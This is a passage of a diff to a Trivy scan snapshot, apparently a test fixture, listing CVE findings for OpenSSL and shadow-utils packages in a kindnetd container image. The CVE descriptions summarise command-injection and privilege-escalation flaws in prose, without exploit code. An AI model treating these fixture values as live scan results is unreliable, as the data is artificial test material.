"https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", - "https://linux.oracle.com/cve/CVE-2022-1292.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", - "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220602-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://ubuntu.com/security/notices/USN-5402-1", - "https://ubuntu.com/security/notices/USN-5402-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1292", - "https://www.debian.org/security/2022/dsa-5139", - "https://www.openssl.org/news/secadv/20220503.txt", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", ], }, "category": "Vulnerability", - "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "c_rehash script allows command injection", + "name": "Improper input validation in shadow-utils package utility chfn", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1292", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1292", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.5-1.1", + "packageName": "passwd", + "references": [ + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", + ], + }, + "category": "Vulnerability", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://issues.rpath.com/browse/RPL-1825", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.5-1.1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", + ], + }, + "category": "Vulnerability", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-2", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5139", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220503.txt", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2068", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-7169", + "installedVersion": "1:4.5-1.1", + "packageName": "passwd", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2068", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", - "https://linux.oracle.com/cve/CVE-2022-2068.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", - "https://security.netapp.com/advisory/ntap-20220707-0008/", - "https://ubuntu.com/security/notices/USN-5488-1", - "https://ubuntu.com/security/notices/USN-5488-2", - "https://www.cve.org/CVERecord?id=CVE-2022-2068", - "https://www.debian.org/security/2022/dsa-5169", - "https://www.openssl.org/news/secadv/20220621.txt", + "https://access.redhat.com/security/cve/CVE-2018-7169", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "https://github.com/shadow-maint/shadow/pull/97", + "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "https://security.gentoo.org/glsa/201805-09", + "https://ubuntu.com/security/notices/USN-5254-1", + "https://www.cve.org/CVERecord?id=CVE-2018-7169", ], }, "category": "Vulnerability", - "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", + "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "the c_rehash script allows command injection", + "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2068", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2068", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", + "value": "https://avd.aquasec.com/nvd/cve-2018-7169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", + "value": "https://access.redhat.com/security/cve/CVE-2018-7169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://github.com/shadow-maint/shadow/pull/97", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://security.gentoo.org/glsa/201805-09", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://ubuntu.com/security/notices/USN-5254-1", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.5-1.1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", + ], + }, + "category": "Vulnerability", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.5-1.1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-1", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5169", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220621.txt", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4450", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-16156", + "installedVersion": "5.28.1-6+deb10u1", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4450", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", - "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", - "https://linux.oracle.com/cve/CVE-2022-4450.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", - "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4450", - "https://www.openssl.org/news/secadv/20230207.txt", + "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "https://access.redhat.com/security/cve/CVE-2020-16156", + "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "https://ubuntu.com/security/notices/USN-5689-1", + "https://ubuntu.com/security/notices/USN-5689-2", + "https://www.cve.org/CVERecord?id=CVE-2020-16156", ], }, "category": "Vulnerability", - "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case 